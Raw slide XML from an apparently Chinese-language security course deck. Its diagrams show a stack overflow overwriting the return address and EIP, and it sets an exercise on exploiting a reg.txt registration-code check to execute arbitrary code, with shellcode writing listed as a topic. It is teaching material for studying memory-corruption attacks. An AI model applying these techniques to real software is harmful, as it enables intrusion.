          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4212524" y="365189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72663E32-E920-A979-E3E6-756FC188AD98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4259987" y="3272091"/>
            <a:ext cx="1415772"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覆盖返回地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58" name="直线连接符 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5313A6B4-8945-5BD8-40DF-BC754A5BD32A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4223792" y="4051658"/>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0" name="直线连接符 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A988F60-42F7-66F8-CBC9-96C6F60B9191}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4212521" y="4476010"/>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6" name="直线连接符 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1659D5EC-A782-CC74-197D-9C674D7F6B9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4211991" y="484326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D7AE939F-863E-C3F2-9AC6-E0DE53C16893}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4223792" y="5218711"/>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416317B0-D166-364A-7090-F8280700B56E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3283781" y="3277860"/>
            <a:ext cx="48282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EIP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46" name="直线箭头连接符 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD0C9459-D7F6-84D4-F676-F3A544F7057B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3719736" y="3439511"/>
            <a:ext cx="423811" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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1E737663-89E9-E614-6CC4-EDB6140CD62F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7248128" y="4102426"/>
            <a:ext cx="1357105" cy="747168"/>
            <a:chOff x="4441749" y="2894215"/>
            <a:chExt cx="1357105" cy="747168"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB7979AC-F16D-CDFC-3735-D6F7200D92B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4441749" y="3265343"/>
              <a:ext cx="1353535"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243A16E9-18E8-ECF8-4A6A-841337ADC11C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4565125" y="2923026"/>
              <a:ext cx="1141030" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="squar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retn</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">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786C1691-6404-22A7-DC75-6638D58CCD23}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4951643" y="3223609"/>
              <a:ext cx="333746" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="squar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63" name="矩形 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8318A26F-D6F2-CE10-7B19-17EBDE739D5F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4441750" y="2894215"/>
              <a:ext cx="1357104"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0" name="组合 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D739221-BAEF-2CA0-8117-3E7AEA39830A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7242994" y="2984130"/>
            <a:ext cx="1357105" cy="747168"/>
            <a:chOff x="4441749" y="2894215"/>
            <a:chExt cx="1357105" cy="747168"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="72" name="矩形 71">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18841E9F-346B-F340-67BD-DB5FCE3B4E1F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4441749" y="3265343"/>
              <a:ext cx="1353535"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文本框 72">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E9AD53-BB4B-6D26-9897-D09FD5B929CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4565125" y="2923026"/>
              <a:ext cx="1141030" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="squar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retn</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="74" name="文本框 73">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D362D1D-05D6-D304-CE21-926847BC82BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4951643" y="3223609"/>
              <a:ext cx="333746" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="squar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75" name="矩形 74">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC3BF935-2A31-74D6-43B7-8A09498AF0D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4441750" y="2894215"/>
              <a:ext cx="1357104"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77" name="组合 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0400F545-9525-D6F8-F15E-8914A91A8E7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7239424" y="1801960"/>
            <a:ext cx="1357105" cy="747168"/>
            <a:chOff x="4441749" y="2894215"/>
            <a:chExt cx="1357105" cy="747168"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="矩形 77">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9A9E416-49EF-70B8-9070-C8D2CE254E2F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4441749" y="3265343"/>
              <a:ext cx="1353535"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文本框 78">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA51C005-499C-7097-A8B4-D30D9E181D82}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4565125" y="2923026"/>
              <a:ext cx="1141030" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>retn</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="80" name="文本框 79">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB64484C-B918-E329-875C-9F1C45CE9485}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4951643" y="3223609"/>
              <a:ext cx="333746" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="squar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87" name="矩形 86">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F2C5318-1455-8E3B-4BDE-F8E873DFA511}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4441750" y="2894215"/>
              <a:ext cx="1357104" cy="376040"/>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91" name="肘形连接符 90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A944423-FE45-94D6-C72B-C0A12A24FC9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="56" idx="3"/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5675759" y="3441368"/>
            <a:ext cx="1572369" cy="1220206"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25268"/>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肘形连接符 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1089E9AA-F2CD-48F6-613C-528500F5D9D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="63" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5650115" y="3117440"/>
            <a:ext cx="1598015" cy="1173006"/>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肘形连接符 96">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD2508B9-1B4D-3F18-5D92-1D53692F489E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="72" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5663952" y="2984130"/>
            <a:ext cx="1579042" cy="559148"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 65309"/>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肘形连接符 99">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{430D2351-038B-AAF5-6016-8E55A748B382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="75" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5669857" y="2733686"/>
            <a:ext cx="1573139" cy="438464"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1726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肘形连接符 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ADE8D0F-EF07-32D3-37F8-5E883E967411}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="78" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5658816" y="2361108"/>
            <a:ext cx="1580608" cy="225990"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 63964"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="1905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肘形连接符 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{855C7900-81B0-AA92-D30F-40B6706FDC63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="87" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="5660101" y="1989979"/>
            <a:ext cx="1579325" cy="319355"/>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48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程序功能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{256161F4-766C-C824-AC32-447B970A69C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6313488" y="1058913"/>
            <a:ext cx="5111750" cy="5249811"/>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0F872ED2-71E8-7C41-B5F8-3757A5012F11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450969" y="1155220"/>
            <a:ext cx="1415772" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>利用目标</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A3CBDEB-575B-00AE-A610-AD66DE4EF034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450969" y="1708259"/>
            <a:ext cx="4824536" cy="1211357"/>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分析程序代码是否存在漏洞，若存在则如何利用漏洞实现执行任意代码（例如弹出一个对话框）？</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 name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCB2067A-5DC1-759E-C799-1864F72C41F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="910369" y="1708259"/>
            <a:ext cx="4824536" cy="1980799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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该程序首先从一个文件</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reg.txt</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中读取一个字符串到</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regcode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，再判断读取的</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regcode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与预期的</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REGCODE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是否一致，如一致则显示“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passed</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”，若不一致则显示“</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t>wrong </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>regcode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>”。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2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5391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3" grpId="0" animBg="1"/>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2C91B1-245D-3264-D824-2C6B17C4E6FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5439410" y="548680"/>
            <a:ext cx="1313180" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC8E2ED7-7683-5F26-3314-E3907882ACB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3287688" y="1844824"/>
            <a:ext cx="5976664" cy="576064"/>
            <a:chOff x="3215680" y="2204864"/>
            <a:chExt cx="5976664" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="矩形 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{532F2316-F8C4-30CC-A0EE-C0ED10DFFCF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01</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">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0C38EC24-B8D7-6357-017D-1BCFE63759D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4655840" y="2204864"/>
              <a:ext cx="4536504" cy="576064"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D6D6D6"/>
            </a:solidFill>
            <a:ln>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solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>  概念及示例</a:t>
              </a:r>
              <a:endPar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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="组合 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0429C429-E869-FC2A-249C-4485661662EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3287688" y="2689475"/>
            <a:ext cx="5976664" cy="576064"/>
            <a:chOff x="3215680" y="2204864"/>
            <a:chExt cx="5976664" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="矩形 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{894D9F5F-EC52-A50D-1DFA-E26CD04C55BF}"/>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latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="矩形 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5356FB38-7F76-FBB1-BAC1-AFEF42D8FCFF}"/>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S</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en"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hellcode</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编写</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{085B336E-CAEF-A723-DE79-29F9B1744562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3287688" y="3534126"/>
            <a:ext cx="5976664" cy="576064"/>
            <a:chOff x="3215680" y="2204864"/>
            <a:chExt cx="5976664" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39FAFEB2-7BE1-FA8E-4242-AEF2DAB530DB}"/>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03</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">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20F92446-92C1-8353-D1C5-60AC6A7AD6AE}"/>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en-US" altLang="zh-CN" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
